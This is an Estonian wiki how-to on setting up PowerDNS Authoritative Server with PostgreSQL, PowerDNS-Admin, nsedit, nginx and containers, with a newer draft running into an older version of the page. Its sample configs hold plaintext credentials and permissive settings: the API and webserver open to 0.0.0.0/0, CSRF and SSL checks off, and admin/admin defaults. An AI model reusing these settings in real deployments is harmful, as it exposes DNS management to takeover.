* NSEC3 kasutab '1 0 0 -' seadistust
* sekundaarsete nimeserveritega suhtlemine toimub catalog-zones abil
* kasutatakse KSK/ZSK ja CSK lähenemist võtmete pidamisel

Protseduuride võimekus

* NSEC, NSEC3 ja NSEC3 param väärtuste muutmine
* võtme vahetus
* krüptimise algoritmi vahetus

====Platvormi ettevalmistamine====

Platvorm koosneb

* Debian v. 12 operatsioonisüsteem
* Docker Community Edition
* PostgreSQL v. 12
* NginX

PostgreSQL

<pre>
root@pdns:/tmp# apt-get install postgresql-common
root@pdns:/tmp# mkdir /etc/postgresql-common/createcluster.d
root@pdns:/tmp# echo "initdb_options = '--data-checksums'" > /etc/postgresql-common/createcluster.d/moraal.conf
root@pdns:/tmp# echo "create_main_cluster = false" >> /etc/postgresql-common/createcluster.d/moraal.conf
root@pdns:/tmp# apt-get install postgresql-16
root@pdns:/tmp# pg_createcluster --locale en_US.UTF-8 16 pgcluster_pdns_prod

postgres=# \x
Expanded display is on.
postgres=# \l postgres
List of databases
-[ RECORD 1 ]-----+------------
Name | postgres
Owner | postgres
Encoding | UTF8
Locale Provider | libc
Collate | en_US.UTF-8
Ctype | en_US.UTF-8
ICU Locale |
ICU Rules |
Access privileges |
</pre>

PowerDNS kasutaja ja create database baasi tekitamiseks sobib öelda

<pre>
# su - postgres
$ psql
sql> create role pdns login;
sql> \password pdns
sql> create database db_pdns owner = pdns;
</pre>

PowerDNS-Admin kasutaja ja create database baasi tekitamiseks sobib öelda

<pre>
# su - postgres
$ psql
sql> create role pda login;
sql> \password pda
sql> create database db_pda owner = pda;
</pre>

====PowerDNS paigaldamine====

PowerDNS ise ja tema tööks otseselt vajalikud komponendid (nt PostgreSQL andmebaas) töötavad nö tavalisel viisil operatsioonisüsteemi protsesside-teenustena st mitte-konteineritena.

<pre>
# apt-get install pdns-server pdns-backend-pgsql pdns-tools
</pre>

Tulemusena käivitatakse pdns server ja tema bind backend.

TODO

PostgreSQL backend kasutamine

<pre>
# psql -h 127.0.0.1 -U pdns pdns < /usr/share/doc/pdns-backend-pgsql/schema.pgsql.sql
Password for user pdns:
CREATE TABLE
CREATE INDEX
CREATE INDEX
CREATE TABLE
CREATE INDEX
...
</pre>

Baasi ligipääs jms kirjeldatakse failis, https://doc.powerdns.com/authoritative/backends/generic-postgresql.html#

<pre>
root@pdns:~# egrep -v "^#|^$" /etc/powerdns/pdns.d/gpgsql.conf
launch+=gpgsql
gpgsql-dbname=db_pdns
gpgsql-dnssec=yes
gpgsql-host=127.0.0.1
gpgsql-password=parool
gpgsql-port=5432
gpgsql-user=pdns
</pre>

bind eemaldamiseks sobib kustutada fail

# rm /etc/powerdns/pdns.d/bind.conf

Tulemusena töötab pdns server, gpgsql backendiga

<pre>
2024-06-16T16:44:00.877817+03:00 pdns systemd[1]: Starting pdns.service - PowerDNS Authoritative Server...
2024-06-16T16:44:00.906026+03:00 pdns pdns_server[3916]: Loading '/usr/lib/x86_64-linux-gnu/pdns/libgpgsqlbackend.so'
2024-06-16T16:44:00.906356+03:00 pdns pdns_server[3916]: This is a standalone pdns
2024-06-16T16:44:00.906408+03:00 pdns pdns_server[3916]: Listening on controlsocket in '/run/pdns/pdns.controlsocket'
2024-06-16T16:44:00.906668+03:00 pdns pdns_server[3916]: UDP server bound to 0.0.0.0:53
2024-06-16T16:44:00.906684+03:00 pdns pdns_server[3916]: UDP server bound to [::]:53
2024-06-16T16:44:00.906735+03:00 pdns pdns_server[3916]: TCP server bound to 0.0.0.0:53
2024-06-16T16:44:00.906750+03:00 pdns pdns_server[3916]: TCP server bound to [::]:53
2024-06-16T16:44:00.906866+03:00 pdns pdns_server[3916]: PowerDNS Authoritative Server 4.9.1 (C) PowerDNS.COM BV
2024-06-16T16:44:00.906881+03:00 pdns pdns_server[3916]: Using 64-bits mode. Built using gcc 12.2.0 on May 28 2024 07:46:05 by root@localhost.
2024-06-16T16:44:00.906891+03:00 pdns pdns_server[3916]: PowerDNS comes with ABSOLUTELY NO WARRANTY. This is free software, and you are welcome to redistribute it according to the terms of the GPL version 2.
2024-06-16T16:44:00.915255+03:00 pdns pdns_server[3916]: Polled security status of version 4.9.1 at startup, no known issues reported: OK
2024-06-16T16:44:00.926644+03:00 pdns pdns_server[3916]: Creating backend connection for TCP
2024-06-16T16:44:00.935773+03:00 pdns pdns_server[3916]: About to create 3 backend threads for UDP
2024-06-16T16:44:00.935850+03:00 pdns systemd[1]: Started pdns.service - PowerDNS Authoritative Server.
2024-06-16T16:44:01.086206+03:00 pdns pdns_server[3916]: Done launching threads, ready to distribute questions
</pre>

ühtegi tsooni ei ole kirjeldatud

<pre>
root@pdns:/tmp# pdnsutil list-all-zones
root@pdns:/tmp#
</pre>

====PowerDNS seadistamine====

Seadistamisel tegeldakse

* api sisselülitamine (PDA jaoks)
* SOA kirje vaikeväärtused
* DNSSEC vaike krüpto

====PowerDNS-Admin paigaldamine - PDA - docker====

PowerDNS-Admin tarvkara töötab docker konteinerina, aga kasutab host arvutist postgresql andmebaasi. Platvorm ettevalmistamine punktis on vajalik kasutaja ja create database tekitatud. PDA kasutamine eeldab, et PDNS juures on sisse lülitatud api liides (vaikimisi http liiklus üle port 8081).

Docker compose fail

<pre>
root@pdns:~# cat docker-compose-pda.yml
services:
svc_pda:
image: powerdnsadmin/pda-legacy:v0.4.2

container_name: cn_pda
restart: always
logging:
driver: json-file
options:
max-size: 50m
ports:
- "9191:80"
environment:
- SECRET_KEY='saladus'
- SQLALCHEMY_DATABASE_URI=postgresql://pda:pdaparool@192.168.10.53/pda
- GUNICORN_TIMEOUT=60
- GUNICORN_WORKERS=2
- GUNICORN_LOGLEVEL=DEBUG
- OFFLINE_MODE=False
- CSRF_COOKIE_SECURE=False

networks:
- nw_pda

networks:
nw_pda:
name: nw_pda
driver: bridge
</pre>

Käivitamiseks

# docker compose -f docker-compose-pda.yml up -d

Tulemusena on aadressil http://192.168.10.53:9191/ PDA webgui sisselogimise ekraan. Pressida Create Account ja esimesena tekitatud kasutaja on admin privileegidega.

TODO

====PowerDNS-Admin paigaldamine - NginX operatsioonisüsteem====

NginX https:// frontend kasutamiseks sobib kasutada sellist seadistust

<pre>
root@pdns:/etc/nginx/sites-enabled# cat /etc/nginx/sites-enabled/pdns
server {
listen 80;
server_name pdns.moraal.ee;
root /var/www/html;

if ($request_uri !~ /.well-known) {
return 301 https://pdns.moraal.ee/;
}
}

server {
listen 443 ssl http2;
server_name pdns.moraal.ee;
ssl_certificate /etc/ssl/localcerts/pdns.moraal.ee.pem;
ssl_certificate_key /etc/ssl/localcerts/pdns.moraal.ee.key;
ssl_session_timeout 1d;
ssl_session_cache shared:MozSSL:10m;
ssl_session_tickets off;
ssl_protocols TLSv1.2 TLSv1.3;
ssl_prefer_server_ciphers off;
ssl_ciphers ECDHE-ECDSA-AES128-GCM-SHA256:ECDHE-RSA-AES128-GCM-SHA256:ECDHE-ECDSA-AES256-GCM-SHA384:ECDHE-RSA-AES256-GCM-SHA384:ECDHE-ECDSA-CHACHA20-POLY1305:ECDHE-RSA-CHACHA20-POLY1305:DHE-RSA-AES128-GCM-SHA256:DHE-RSA-AES256-GCM-SHA384:DHE-RSA-CHACHA20-POLY1305;

client_max_body_size 25m;

ssl_stapling off;
add_header Strict-Transport-Security "max-age=63072000" always;

access_log /var/log/nginx/access-pdns.moraal.ee-443.log;
root /var/www/html;

location / {
proxy_set_header Host $http_host;
proxy_set_header X-Forwarded-For $remote_addr;
proxy_set_header X-Forwarded-Proto https;
proxy_pass http://192.168.10.53:9191;
}
}
</pre>

====PowerDNS-Admin paigaldamine - NginX docker====

<pre>
# cat /srv/pdns/volume/nginx/etc/nginx/nginx.conf
# nginx.conf

user nginx;
worker_processes auto;
error_log /dev/stderr;
pid /var/run/nginx.pid;

events {
worker_connections 1024;
}

http {
include mime.types;
default_type application/octet-stream;

log_format main '$remote_addr - $remote_user [$time_local] "$request" '
'$status $body_bytes_sent "$http_referer" '
'"$http_user_agent" "$http_x_forwarded_for"';
access_log /dev/stdout main;

sendfile on;
keepalive_timeout 65;

# Redirect HTTP to HTTPS
server {
listen 80;
server_name _;
return 301 https://$host$request_uri;
}

# HTTPS Configuration
server {
listen 443 ssl;
server_name _;
http2 on;
ssl_protocols TLSv1.3;
ssl_prefer_server_ciphers on;

ssl_certificate /etc/ssl/localcerts/ns-pdns-01.auul.pri.ee.crt;
ssl_certificate_key /etc/ssl/localcerts/ns-pdns-01.auul.pri.ee.key;

# Recommended security settings
ssl_session_cache shared:SSL:10m;
ssl_session_timeout 10m;
ssl_ciphers ECDHE-ECDSA-AES128-GCM-SHA256:ECDHE-ECDSA-AES256-GCM-SHA384:ECDHE-ECDSA-CHACHA20-POLY1305;

# Logging
access_log /dev/stdout;
error_log /dev/stdout;

# Reverse proxy to the destination
location / {
proxy_pass http://svc_pdns:8081;
proxy_set_header Host $host;
proxy_set_header X-Real-IP $remote_addr;
proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
proxy_set_header X-Forwarded-Proto $scheme;
}
}
}
</pre>

====Misc====

Tulemusena saab pda webgui poole pöörduda aadressiga https://pdns.moraal.ee/.

PDA kasutaja parooli muutmine postgresql baasis, nb rakendus kasutab tabeli nimena 'user', see on postgresql nö built-in objekt ja name clash ületamiseks tuleb pöörduda rakendusega seotud ressursi poole "user" abil, eriti koos skeemi prefiksiga

<pre>
# su - postgres
$ psql db_pda
pda=# select * from public."user";
-[ RECORD 1 ]------------------------------------------------------------
id | 1
username | admin
password | $2y$15$NgdA4JSsKb1RyaiWBdKjcODfgxkwmhMB.95sa07PX/d9a9QxZ/4FF
firstname | Imre
lastname | Oolberg
email | imre.oolberg@auul.pri.ee
otp_secret |
role_id | 1
confirmed | f
..

db_pda=# update public."user" set password='$2y$15$NgdA4JSsKb1RyaiWBdKjcODfgxkwmhMB.95sa07PX/d9a9QxZ/4FC' where username='admin';
UPDATE 1
</pre>

kusjuures password väärtus tekitatakse nt

<pre>
$ htpasswd -bnBC 15 "" pdaparool | tr -d ':\n'
$2y$15$NgdA4JSsKb1RyaiWBdKjcODfgxkwmhMB.95sa07PX/d9a9QxZ/4FC
</pre>

Kasutaja lisamine

<pre>
db_pda=# insert into "user" (username, password, firstname, lastname, email, role_id, confirmed) values ('admin', '$2b$12$4M9qXQaWn95GTregvSO2v.I/1QQT0/Ayqt3jZsMp06FIa5dMme6Gu', 'Administrator', 'Administrator', 'priit@moraal.ee', 1, 'f');
</pre>

pdns api kontakti lisamine

<pre>
db_pda=# insert into setting (name, value) values ('pdns_api_url', 'http://192.168.10.80:8081');
INSERT 0 1
db_pda=# insert into setting (name, value) values ('pdns_api_key', 'apiparool');
INSERT 0 1
db_pda=# insert into setting (name, value) values ('pdns_version', '4.9.11');
INSERT 0 1
db_pda=# select * from setting;
id | name | value
----+--------------+------------------------
7 | pdns_api_url | http://192.168.10.80:8081
8 | pdns_api_key | apiparool
9 | pdns_version | 4.9.11
(3 rows)
</pre>

====PDA kasutamise privileegid====

Väited

* Account - grupi taoline moodustis, praktiliselt võiks vastata domeeni omanik asutusele
* User - kasutaja taoline moodustis, vastab inimesele kes süsteemi kasutab
* User ja Account vaheliste seoste abil saab anda hulgale kasutajatele õiguse tegeleda hulga domeenidega

<pre>
root@rv-xxx-01:/opt/pda/dc# docker exec -ti e8 sh
/app $ ps aux
PID USER TIME COMMAND
1 pda 0:00 {gunicorn} /usr/bin/python3 /usr/bin/gunicorn powerdnsadmin:create_app() -t 60 --workers 2 --bind 0.0.0.0:80 --log-level DEBUG
7 pda 0:02 {gunicorn} /usr/bin/python3 /usr/bin/gunicorn powerdnsadmin:create_app() -t 60 --workers 2 --bind 0.0.0.0:80 --log-level DEBUG
8 pda 0:01 {gunicorn} /usr/bin/python3 /usr/bin/gunicorn powerdnsadmin:create_app() -t 60 --workers 2 --bind 0.0.0.0:80 --log-level DEBUG

[2025-10-31 13:06:25,927] [record.py:61] ERROR - Cannot fetch zone's record data from remote powerdns api. DETAIL: HTTPSConnectionPool(host='rvxxx-01.test.moraal.ee', port=443): Max retries exceeded with url: /api/v1/servers/localhost/zones/imretest-03.ee (Caused by SSLError(SSLCertVerificationError(1, '[SSL: CERTIFICATE_VERIFY_FAILED] certificate verify failed: self-signed certificate in certificate chain (_ssl.c:1007)')))

volumes:
# - /opt/pda/volume/pda/etc/ssl/certs/ca-certificates.crt:/usr/lib/python3.10/site-packages/certifi/cacert.pem
</pre>

====PDA API liidese kasutamine====

Tsooni tekitamine

<pre>
$ curl -s -L -H 'Content-Type: application/json' -H 'Authorization: Basic xxx' -X POST https://pda.moraal.ee/api/v1/pdnsadmin/zones \
--data '{"name": "zone-moraal-imre-test-01.ee.", "kind": "MASTER", "nameservers": ["ans1.moraal.ee.", "ans2.moraal.ee."]}' | jq .
{
"account": "",
"api_rectify": false,
"catalog": "",
"dnssec": false,
"edited_serial": 2026010802,
"id": "zone-moraal-imre-test-01.ee.",
"kind": "Master",
"last_check": 0,
"master_tsig_key_ids": [],
"masters": [],
"name": "zone-moraal-imre-test-01.ee.",
"notified_serial": 0,
"nsec3narrow": false,
"nsec3param": "",
"rrsets": [
{
"comments": [],
"name": "zone-moraal-imre-test-01.ee.",
"records": [
{
"content": "ans1.moraal.ee. hostmaster.moraal.ee. 2026010801 86400 7200 2419200 10800",
"disabled": false
}
],
"ttl": 3600,
"type": "SOA"
},
{
"comments": [],
"name": "zone-moraal-imre-test-01.ee.",
"records": [
{
"content": "ans1.moraal.ee.",
"disabled": false
},
{
"content": "ans2.moraal.ee.",
"disabled": false
}
],
"ttl": 3600,
"type": "NS"
}
],
"serial": 2026010801,
"slave_tsig_key_ids": [],
"soa_edit": "",
"soa_edit_api": "DEFAULT",
"url": "/api/v1/servers/localhost/zones/zone-moraal-imre-test-01.ee."
}
</pre>

Kui pole ligipääsu saab sellise vastuse

<pre>
% curl -s -L -H 'Content-Type: application/json' -H 'X-API-KEY: xxx' -X GET "https://pda.moraal.ee/api/v1/servers/localhost/zones/zone-moraal-imre-test-01.ee" | jq .
{
"msg": "Zone access not allowed"
}
</pre>

===pdns docker lahendus===

<pre>
# egrep -v "^$|^#" /etc/powerdns/pdns.conf
allow-axfr-ips=127.0.0.1,192.168.10.0/24
allow-notify-from=
allow-unsigned-notify=yes
also-notify=
api=yes
api-key=saladus
default-api-rectify=yes
default-ksk-algorithm=ecdsa256
default-soa-content=ans1.auu.pri.ee hostmaster.auul.pri.ee 0 86400 7200 2419200 10800
default-soa-edit=INCEPTION-INCREMENT
default-soa-edit-signed=INCEPTION-INCREMENT
default-ttl=3600
disable-syslog=no
forward-notify=
include-dir=/etc/powerdns/pdns.d
launch=
local-address=172.30.0.15, 10.30.0.15
local-port=53
log-dns-details=yes
log-dns-queries=yes
log-timestamp=yes
loglevel=4
only-notify=
primary=yes
secondary=yes
webserver=yes
webserver-address=10.30.0.15
webserver-allow-from=0.0.0.0/0
webserver-loglevel=detailed
webserver-password=saladus
webserver-port=8081
</pre>

===pdns podman lahendus===

PDNS Quadlet Service kirjeldus

<pre>
kasutaja@ns-pdns-01:~$ cat .config/containers/systemd/pdns-01.container
[Unit]
Description=My PDNS Quadlet Service
DefaultDependencies=no
After=network.target

[Container]
Image=docker.io/powerdns/pdns-auth-49:latest
PublishPort=1053:8053/tcp
PublishPort=1053:8053/udp
ContainerName=pdns-01
Volume=%h/volume/pdns/etc/powerdns/pdns.conf:/etc/powerdns/pdns.conf:ro
Environment=PDNS_local_port=8053

[Install]
# This tells systemd to start it when you log in
WantedBy=default.target
</pre>

ning pdns.conf seadistusfail

<pre>
# cat /opt/pdns/volume/pdns/etc/powerdns/pdns.conf
local-address=0.0.0.0
launch=
# include-dir=/etc/powerdns/pdns.d
api=yes
api-key=parool
webserver=yes
webserver-address=0.0.0.0
webserver-allow-from=0.0.0.0/0

#master=yes

primary=yes
secondary=yes
allow-axfr-ips= 100.20.21.0/24,127.0.0.1/32,172.17.0.0/16
also-notify=192.168.1.150
only-notify=
forward-notify=
default-soa-content=ans1.auul.pri.ee hostmaster.auul.pri.ee 0 86400 7200 2419200 10800
default-soa-edit=INCEPTION-INCREMENT
default-soa-edit-signed=INCEPTION-INCREMENT
default-ttl=3600

default-ksk-algorithm=ecdsa256
default-api-rectify=yes
# default-nsec3-param=1 0 0 -

launch+=gpgsql
gpgsql-dnssec=yes
gpgsql-extra-connection-parameters=password=parool dbname=db_pdns port=5432 user=pdns host=192.168.1.147
</pre>

===Tsooni migreerimine pädeva pdns peale===

Väited

* SOA-EDIT -

====Protseduur====

TODO

====Käsundamine====

Eksport

<pre>
# pdnsutil show-zone moraal.ee
# pdnsutil export-zone-key moraal.ee 17 > moraal.ee.ksk
# pdnsutil list-zone moraal.ee > moraal.ee.zone
</pre>

Import

<pre>
# pdnsutil load-zone moraal.ee.zone
# pdnsutil set-kind moraal.ee master
# pdnsutil set-meta moraal.ee SOA-EDIT-API DEFAULT
# pdnsutil set-meta moraal.ee SOA-EDIT INCEPTION-DEFAULT
# pdnsutil import-zone-key moraal.ee moraal.ee.ksk ksk
# pdnsutil set-nsec3 moraal.ee '1 0 0 -'
# pdnsutil rectify-zone moraal.ee
# pdnsutil show-zone moraal.ee
</pre>

====Käsundamine - 2nd abil====

Tekitatakse migreeritava tsooni sekundaar

<pre>
# pdnsutil create-secondary-zone moraal.ee 192.168.1.148
</pre>

===Kasulikud lisamaterjalid===

* https://www.powerdns.com/
* http://www.poweradmin.org/
* https://github.com/PowerDNS/pdns/wiki/WebFrontends
* http://jpmens.net/2010/10/29/alternative-dns-servers-the-book-as-pdf/
* https://blog.powerdns.com/2016/02/02/powerdns-authoritative-the-new-old-way-to-manage-domains/
* https://www.cloudflare.com/dns/dnssec/how-dnssec-works/

PowerDNS Authoritative Server nimeserveri kasutamine

2026-06-17T10:36:50Z

Imre: /* Tsooni migreerimine pädeva pdns peale */

===Sissejuhatus===

PowerDNS https://www.powerdns.com/ on üks populaarsetest vaba tarkvaralistest nn alternatiivsetest DNS serveritest, kuigi 'alternatiivse' kohta väidetavalt teda kasutatakse väga massiliselt DNSSEC jaoks. PowerDNS tarkvara võimaldab pidada täielist DNS infrastruktuuri, sh slave ja master pädevate nimeserverite erinevad konfiguratsioonid. PowerDNS tarkvara komplekti kuuluvad

* PowerDNS Authoritative Server - pädev nimeserver
* PowerDNS Recursor - rekursiivne nimeserver
* dnsdist - koormusjaotur

PowerDNS Authoritative Server tarkvaral on sellised tunnused

* võimalus kasutada andmete salvestamiseks erinevaid nn backend'isid (nn plain text, sql andmebaas, ldap kataloog jne)
* väga mugavalt korraldada DNSSEC tsooni pidamist
* DNSSEC puhul on PowerDNS tarkvarale iseloomulik, et kõik DNSSEC moodustatakse käigult, st midagi ei ole salvestatud (well, midagi puhverdatakse, aga rrsig moodi kirjeid jms ei hoita nö tsoonifaili kujul)
* tsoonide käsitlemine (tekitamine, sisu muutmine, eemaldamine) on võimalik üle nn API
* eksisteerivad mitmesugused veebipõhised tsoonide haldusliidesed (otse baasi ja üle API)
* ebamugav on kontrollida, kust tsooni kopeeritakse, kuhu notify saadetakse ja kust lubatakse tsooni kopeerida

Haldusliidesed jagunevad kaheks

* kirjutavad otse samasse sql baasi, mida kasutab PowerDNS ja tegelikult töötavadki ainult SQL backendide puhul - nt Poweradmin, http://www.poweradmin.org/
* suhtlevad PowerDNS'iga üle API, töötavad kõigi backendide puhul - nt nsedit, https://github.com/tuxis-ie/nsedit

Järgnevas tekstis öeldakse lühiduse mõttes PowerDNS ja mõeldakse PowerDNS Authoritative Server ehk pädevat komponenti.

===Tööpõhimõte===

PowerDNS tarkvara saab kasutada erinevates konfiguratsioonides

* nö suure pildi mõttes, nt PowerDNS on varjatud master ja avalikus võrgus teenindavad NSD nimeserverid (alternatiiv oleks pidada PowerDNS nimeserverit otse avalikus võrgus)
* PowerDNS enda komponentidest on välja valitud mingi komplekt, nt baas osa ja PostgreSQL backend (alternatiiv oleks BIND formaadis tekstifailid failisüsteemis)
* tsooniandmete haldamiseks kasutatakse käsurea utiliiti pdnsutil ja nsedit php rakendust

Käesolevas tekstis keskendutakse just mainitud konfiguratsioonile. Kui PowerDNS kasutab SQL backendi, siis avaliku pädeva DNS teenuse pakkumise juures tekitab see vähemalt esmapilgul kahtlusi. Võib olla on hea mõte tekitada varjatud masteriga lahendus

ans1 (NSD) ans2 (NSD)
_____ _____
| | | |
| | | |
|_____| port 8952 |_____| port 8952
| |
| |
----|---------------------|----------------------|----
|
__|__
| | nimetaja (PowerDNS)
| |
|_____|

kus

* ans1, ans2 - avalikud pädevad nimeserverid, tehniliselt slave'id
* nimetaja - varjatud pädev nimeserver, tehniliselt master
* üle port 8952 saab nsd protsessi eemalt juhtida (alternatiiv on juhtida nö tavalisel viisil, lokaalselt)

Käesolevas tekstis pööratakse NSD tarkvara kasutamisele tähelepanu minimaalselt. NSD tekst asub aadressil [[:Pädeva nimeserveri NSD v. 4 kasutamine operatsioonisüsteemiga Debian]].

===Tarkvara paigaldamine ja seadistamine===

Tarkvara paigaldamiseks on üldiselt kaks võimalust

* operatsioonisüsteemi paketihaldus
* PowerDNS repositoorium - https://repo.powerdns.com/

PowerDNS tarkvara on jaotatud komponentideks

* üldosa
* tsoonidega seotud andmete salvesamiseks erinevad backendid (failisüsteem, SQL andembaas jne)

Kui asutakse kasutama SQL backendi, siis võib olla otstarbekas enne PowerDNS vastava backendi paigaldamist baas ise paigaldada ja käivitada; nt nt see baas ei pruugi olla tingimata samas arvutis. Teisipidi, mugavam on samas arvutis, kuna sel juhul baasi saab lähtestada dbconfig süsteemi abil; lisaks, kui kasutatakse DNSSEC'i, siis arvestada, et krüptomaterjal asub baasis. Käesolevas tekstis paigaldatakse tarkvara PowerDNS repositooriumist kuna seal on alati kõige värskem.

====PostgreSQL andmebaasi ettevalmistamine====

PowerDNS tarkvara ei ole PostgreSQL andmebaasi versiooni suhtes nõudlik, tõenäoliselt sobib igasugune v. 9.x ja nt en_US.UTF-8 kodeering

# apt-get install postgresql

====Paigaldamine PowerDNS repositooriumist====

PowerDNS repositoorium asub aadressil https://repo.powerdns.com/ ja kasutamine (Debian v. 9 Stretch juhtumil)

# cat /etc/apt/sources.list.d/pdns.list
deb http://repo.powerdns.com/debian stretch-auth-master main

ning öelda

# curl https://repo.powerdns.com/CBC8B383-pub.asc | sudo apt-key add -
# apt-get update

Tarkvara paigaldamiseks öelda (paistab, et bind backend paigaldatakse lisaks paratamatult)

# apt-get install pdns-server pdns-backend-pgsql

seejuures on valik paigaldada baas db-config süsteemi abil ja see validagi. Tulemusena tekitatakse baasi baasi kasutaja, create database, initsiliseeritakse baasi sisu ning kirjeldatakse PowerDNS backend seadistus

# cat /etc/powerdns/pdns.d/pdns.local.gpgsql.conf
# PostgreSQL Configuration
#
# Launch gpgsql backend
launch+=gpgsql

# gpgsql parameters
gpgsql-host=127.0.0.1
gpgsql-port=
gpgsql-dbname=pdns
gpgsql-user=pdns
gpgsql-password=pdnsparool
gpgsql-dnssec=yes

Vaikimisi käivitatakse PowerDNS protsessid ning natuke saab asuda süsteemi kasutama

# pdns_control list-zones
All zonecount:0

Järgmisena tuleb PowerDNS server seadistada.

====Käsitsi baasi lähtestamine====

Kui db-config süsteemi mitte kasutada, sobib tekitada kasutaja ja create database andmebaas käsitsi

# su - postgres
$ psql
..
postgres=# create role pdns login password 'pdnsparool' NOSUPERUSER INHERIT NOCREATEDB NOCREATEROLE;
postgres=# create database pdns owner = pdns;

ning seejärel laadida baasi sisu, õieti struktuur

# psql -h 127.0.0.1 -U pdns pdns < /usr/share/doc/pdns-backend-pgsql/schema.pgsql.sql

Lisaks peab olema seadistusfail /etc/powerdns/pdns.d/pdns.local.gpgsql.conf sobiva sisuga, vt. eelmist punkti.

===Tarkvara seadistamine===

Üldosa sobiks kokkuvõttes seadistada nt nii

# egrep -v "^$|^#" /etc/powerdns/pdns.conf
allow-axfr-ips=127.0.0.0/8,::1,192.168.1.210
also-notify=192.168.1.210
api=yes
api-key=midagisalajast123
default-soa-mail=hostmaster.moraal.ee.
default-soa-name=ans1.moraal.ee.
include-dir=/etc/powerdns/pdns.d
launch=
master=yes
only-notify=192.168.1.210
security-poll-suffix=
setgid=pdns
setuid=pdns
slave=yes
soa-expire-default=3600000
soa-minimum-ttl=3600
soa-refresh-default=86400
soa-retry-default=7200
webserver=yes
webserver-address=192.168.1.248
webserver-allow-from=0.0.0.0/0,::/0,192.168.10.0/24

kus

* allow-axfr-ips - millistelt ip aadressidelt on lubatud axfr
* also-notify - millistele ip aadressidel töötavatele nimeserveritele saata notify
* api* - api kasutamine (vajalik veebipõhise haldusliidese nsedit jaoks)
* default-soa-* - uue tsooni sisu moodustamisel kasutatavad vaikeväärtused
* only-notify - notify saadetakse ainult näidatud ip aadressidele (mitte tsoonifailides siselduvatele NS serveritele)
* soa-* uue tsooni sisu moodustamisel kasutatavad vaikeväärtused
* webserver* - powerdns sisemise veebiserveri ip aadress jms (saab uurida protsesside statistikat)

Muudatuste kehtestamiseks lõpetada ja käivitada pdns protsessid

# systemctl stop pdns
# systemctl start pdns

===Tsooni sisu haldamine käsurealt===

Tsooni sisu haldamine käsurealt toimub utiliidi pdnsutil abil. Uue tühja tsooni tekitamine (sisaldab SOA kirjet), seejärel tuleb vähemalt NS kirje tekitada (nb! nii tekib Native tüüpi tsoon)

# pdnsutil create-zone moraal.ee

Tulemuse küsimine

# pdnsutil show-zone moraal.ee

Tsooni Native -> Master teisendus

# pdnsutil set-kind moraal.ee master

Tsooni sisu esitamiseks

# pdnsutil list-zone moraal.ee

Sisu muutmiseks, sh muuta käsitsi SOA serial

# pdnsutil edit-zone moraal.ee

utiliidiga seriali suurendamiseks

# pdnsutil increase-serial moraal.ee

Tulemuse küsimine

# dig @127.0.0.1 moraal.ee axfr

Notify käsitsi välja saatmiseks

# pdns_control notify moraal.ee
Added to queue

Kirje lisamine (lisaks tuleb increase serial öelda)

# pdnsutil add-record moraal.ee imre5 A 300 "127.0.0.5"
Feb 21 10:20:54 [bindbackend] Done parsing domains, 0 rejected, 0 new, 0 removed
New rrset:
imre5.moraal.ee. IN A 300 127.0.0.5

===Veebipõhine haldusliides nsedit===

Veebipõhiste haldusliideste abil saab

* tekitada ja kustutada tsoone, muuta tsoonide sisu
* loodetavasti haldusliidese abil jäävad tegemata mingid süntaksivead, mida on kerge teha nn BIND-ühilduvat tsoonifaili tavalise tekstieditoriga otse muutes
* tsooni sisu halduse saab usaldada mitte-vi/joe/nano ekspertiisiga inimesele

Paistab, et veebipõhiseid haldusliideseid on omajagu, https://github.com/PowerDNS/pdns/wiki/WebFrontends. nsedit on PHP rakendus. Märkused

* Tsoonis tehtud muudatustega kaasneb automaatselt SOA seriali suurenemine
* Veebiliideses tehtud muudatused ei kajastu alati sama veebiliideses koheselt (nt SOA seriali muutumine, välja ja sisselogimise järel on näha)
* nsedit esitab muudatuste logi
* toimib ipv6 jaoks
* nn õäöü tähti sisaldavaid nimesid sisestada otseselt ei saa
* rakenduse võib paigaldada http:// peale ja seejärel muuta veebiserveri seadistusi ning kasutada edasi https:// abil
* nsedit ei pea asuma samas arvutis PowerDNS serveriga, suhtlemine toimub üle võrgu ja kasutades API liidest

====Ettevalmistused====

nsedit kasutamise eelduseks on selline tarkvara

# apt-get install apache2 php git php-sqlite3 php-curl

====Paigaldamine ja seadistamine====

Kopeerida tarkvara, tundub, et 2017 aasta alguses on praktiline võtta git repo viimane ots

# cd /var/www/html
# git clone https://github.com/tuxis-ie/nsedit.git

Tekitada php skriptide jaoks kasutaja:grupp

# groupadd nsedit
# useradd -g nsedit -m -d /opt/nsedit -s /bin/false nsedit

Avades brauseris http://pdns.moraal.ee/nsedit küsitakse parooli, vaikimisi sobib admin ja admin mille järel

* kontrollitakse vajalike teekide olemasolu
* moodustatakse sqlite3 andmebaas

# sqlite3 /var/www/html/etc/pdns.users.sqlite3
..
sqlite> .tables
logs users zones

nsedit seadistatakse failis /var/www/html/nsedit/includes/config.inc.php

# cp includes/config.inc.php-dist includes/config.inc.php

* ühendust powerdns serveriga üle api juhib sektsioon

# cat /var/www/html/nsedit/includes/config.inc.php | grep '^$api'
$apipass = 'apiparool'; # The PowerDNS API-key
$apiip = '10.0.9.18'; # The IP of the PowerDNS API
$apiport = '8081'; # The port of the PowerDNS API
$apiproto = 'http'; # http | https
$apisslverify = FALSE; # Verify SSL Certificate if using https for apiproto

* vaikeväärtuste kasutamiset haldusliideses kontrollib

$defaults['soa_edit'] = 'INCEPTION-INCREMENT';
$defaults['soa_edit_api'] = 'INCEPTION-INCREMENT';
$defaults['defaulttype'] = 'Master'; # Choose between 'Native' or 'Master'
$defaults['ns'][0] = 'ns1.moraal.ee.'; # The value of the first NS-record
$defaults['ns'][1] = 'ns2.moraal.ee.'; # The value of the second NS-record
$defaults['ttl'] = 3600; # Default TTL for records
$defaults['disabled'] = false; # Default disabled state

Kasutajaliides paistab välja selline

[[Pilt:Pdns-1.gif]]

kus

* TODO

Kui rakendus töötab, muuta rakenduse failide omanik:grupp ära

# chown -R nsedit:nsedit /var/www/html/nsedit

====Kasutamine====

* Kasutajate lisamine, valida (ning märkida linnuke admin user jaoks), tulemusena on nsedit logid paremad

Users -> Add new user

* Uue tsooni lisamine, valida

Zones -> Add new zone

ning sisestada Domain lahtrisse domeeninimi, lõpetades punktiga, nt

test-1.ee.

Kõik muud valikud jätta vaikimisi

Account - admin
Type - master
Template - None

Kuna pdns serveri seadistusfailisis on näidatus SOA kirje väärtused ja nsedit seadisusfailis on kirjeldatud nimeserverid, siis tekib vaikimisi kastutatav tulemus.

* Uue tsooni lisamine kirjeldades korraga palju kirjeid (nt tsooni ületoomisel eelmise dns teenusepakkuja juurest)

Zones -> Import a new zone

